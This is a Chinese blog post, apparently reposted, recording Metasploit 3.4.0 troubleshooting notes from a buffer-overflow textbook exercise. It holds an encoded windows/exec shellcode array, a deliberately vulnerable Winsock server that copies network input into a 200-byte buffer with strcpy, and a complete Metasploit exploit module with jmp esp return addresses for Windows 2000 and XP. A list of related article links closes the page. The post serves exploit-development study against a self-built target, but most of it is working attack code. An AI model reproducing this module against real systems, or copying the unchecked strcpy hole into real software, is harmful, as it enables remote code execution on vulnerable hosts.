Metasploit使用问题记录及攻击测试代码
来源:互联网 发布:荷塘月色淘宝论坛官网 编辑:程序博客网 时间:2024/06/16 02:18
1、利用failwest书中的例子进行测试,执行exploit后提示如下信息,说明 Payload'中的Space过小,增大即可,后面有例子程序可进行测试。
'Payload' =>
{
'Space' => 300,
'BadChars' => "\x00",
'StackAdjustment' => -3500,
},
[-] Exploit failed: No encoders encoded the buffer successfully.
[*] Exploit completed, but no session was created.
2、如提示无法加载模块,说明rb文件书写语法有误,需要更改,不同的版本有可能语法也不完全相同,如下面的rb测试代码放到最新的版本中则无法加载,使用时注意。
3、目前使用metasploit3.4.0版本进行测试,测试时发现targets 中sp2及win 2000地址失效,所以用[ 'Windwos xp sp3', { 'Ret' => 0x7c86467b} ], ,0x7c86467b地址为jmp esp测试成功,使用metasploit console输入 msfpescan -f -j esp c:/windows/system32/kernel32.dll
4、metasploit常用命令:
use 模块名
set payload XX
set rhost XX
set rport XX
set exitfunc seh
set cmd calc
set payload windows/exc
5、配置的shellcode为223个字节,即上面的300可以改为223
/*
* windows/exec - 223 bytes
* http://www.metasploit.com
* Encoder: x86/shikata_ga_nai
* EXITFUNC=process, CMD=calc
*/
unsigned char buf[] =
"\xd9\xe5\xbd\x20\x99\xb8\x99\x31\xc9\xd9\x74\x24\xf4\x5e\xb1"
"\x32\x83\xee\xfc\x31\x6e\x13\x03\x4e\x8a\x5a\x6c\x72\x44\x13"
"\x8f\x8a\x95\x44\x19\x6f\xa4\x56\x7d\xe4\x95\x66\xf5\xa8\x15"
"\x0c\x5b\x58\xad\x60\x74\x6f\x06\xce\xa2\x5e\x97\xfe\x6a\x0c"
"\x5b\x60\x17\x4e\x88\x42\x26\x81\xdd\x83\x6f\xff\x2e\xd1\x38"
"\x74\x9c\xc6\x4d\xc8\x1d\xe6\x81\x47\x1d\x90\xa4\x97\xea\x2a"
"\xa6\xc7\x43\x20\xe0\xff\xe8\x6e\xd1\xfe\x3d\x6d\x2d\x49\x49"
"\x46\xc5\x48\x9b\x96\x26\x7b\xe3\x75\x19\xb4\xee\x84\x5d\x72"
"\x11\xf3\x95\x81\xac\x04\x6e\xf8\x6a\x80\x73\x5a\xf8\x32\x50"
"\x5b\x2d\xa4\x13\x57\x9a\xa2\x7c\x7b\x1d\x66\xf7\x87\x96\x89"
"\xd8\x0e\xec\xad\xfc\x4b\xb6\xcc\xa5\x31\x19\xf0\xb6\x9d\xc6"
"\x54\xbc\x0f\x12\xee\x9f\x45\xe5\x62\x9a\x20\xe5\x7c\xa5\x02"
"\x8e\x4d\x2e\xcd\xc9\x51\xe5\xaa\x26\x18\xa4\x9a\xae\xc5\x3c"
"\x9f\xb2\xf5\xea\xe3\xca\x75\x1f\x9b\x28\x65\x6a\x9e\x75\x21"
"\x86\xd2\xe6\xc4\xa8\x41\x06\xcd\xca\x04\x94\x8d\x0c";
#include <IOSTREAM.H>
#include <WINSOCK2.H>
#pragma comment(lib,"ws2_32.lib")
VOID msg_display(char *buf)
{
char msg[200];
strcpy(msg,buf);
cout<<"****************"<<endl;
cout<<msg<<endl;
}
void main()
{
SOCKET sock,msgsock,length,receive_len;
struct sockaddr_in sock_server,sock_client;
char buf[0x200];
WSADATA wsa;
WSAStartup(MAKEWORD(1,1),&wsa);
if ((sock=socket(AF_INET,SOCK_STREAM,0))<0)
{
cout<<sock<<"Socket Creating Error!"<<endl;
exit(1);
}
sock_server.sin_family=AF_INET;
sock_server.sin_port=htons(7777);
sock_server.sin_addr.S_un.S_addr=INADDR_ANY;
if (bind(sock,(sockaddr *)&sock_server,sizeof(sock_server)))
{
cout<<"binging stream socket error!"<<endl;
}
cout<<"**********************************"<<endl;
cout<<" exploit target server 1.0 "<<endl;
cout<<"**********************************"<<endl;
listen(sock,4);
length=sizeof(struct sockaddr);
do
{
msgsock=accept(sock,(struct sockaddr *)&sock_client,(int *)&length);
if (msgsock==1)
{
cout<<"accept error!"<<endl;
break;
}
else
do
{
memset(buf,0,sizeof(buf));
if ((receive_len=recv(msgsock,buf,sizeof(buf),0))<0)
{
cout<<"reading stream message error!"<<endl;
receive_len=0;
}
msg_display(buf);
}while(receive_len);
closesocket(msgsock);
} while (1);
WSACleanup();
}
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = AverageRanking
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'JYH testing Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow, an attacker may be able to execute arbitrary code.
},
'Author' => [ 'JYH' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 9262 $',
'References' =>
[
[ 'CVE', '2008-0226' ],
[ 'OSVDB', '41195'],
[ 'BID', '27140' ],
],
'Privileged' => true,
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
'Space' => 300,
'BadChars' => "\x00",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows 2000', { 'Ret' => 0x77F8948B } ],
[ 'Windwos xp sp2', { 'Ret' => 0x7C914393 } ],
[ 'Windwos xp sp3', { 'Ret' => 0x7c86467b} ],
],
'DefaultTarget' => 1,
'DisclosureDate' => 'Jan 4 2012'))
end
def exploit
print_status("Trying target")
connect
#sock.get_once
#print_status("Trying target #{target.name}...")
buf = 'A' * 200
buf += [ target.ret ].pack('V')
buf += payload.encoded
sock.put(buf)
handler
disconnect
end
end
- Metasploit使用问题记录及攻击测试代码
- Metasploit的使用测试
- Metasploit渗透Ubuntu 12.04攻击测试演练
- Metasploit 攻击
- 使用metasploit进行渗透攻击步骤
- Metasploit下载地址及使用
- XSS攻击测试代码
- 内网中使用metasploit进行渗透测试
- 渗透测试之学习使用metasploit
- 使用MetaSploit在WinXP对Win2000进行攻击
- Redis 单点模式和集群模式代码测试及问题记录
- memcache测试代码及使用
- metasploit 自动攻击
- Metasploit 攻击winXP
- jpg图片攻击测试代码
- metasploit使用
- 《metasploit渗透测试魔鬼训练营》学习笔记第五章--网络服务渗透攻击
- Kali渗透测试——利用metasploit攻击靶机WinXP SP1
- 程序员技术练级攻略 新入职程序员应该看的
- linux下Erlang安装,解决pthread/ethr_event.c:98: Fatal error in wait__(): Function not implemented 问题
- 将Show In菜单添加至视图或编辑器的右键菜单中
- 同一台机器安装不同版本的oracle数据库的注意点
- QtCassandra 程序2
- Metasploit使用问题记录及攻击测试代码
- 羌笛声声胡笳怨,此心长寄天涯远
- linux一些用到的命令。
- 3.JavaScript工作原理
- C++静态成员函数学习
- 心得10--网络编程1
- sql sqlserver 创建数据库 数据表 循环 合并表的几个例子
- IJG是什么,有哪些优点 IJG VS IJL
- 在ecshop中添加页面,并且实现后台管理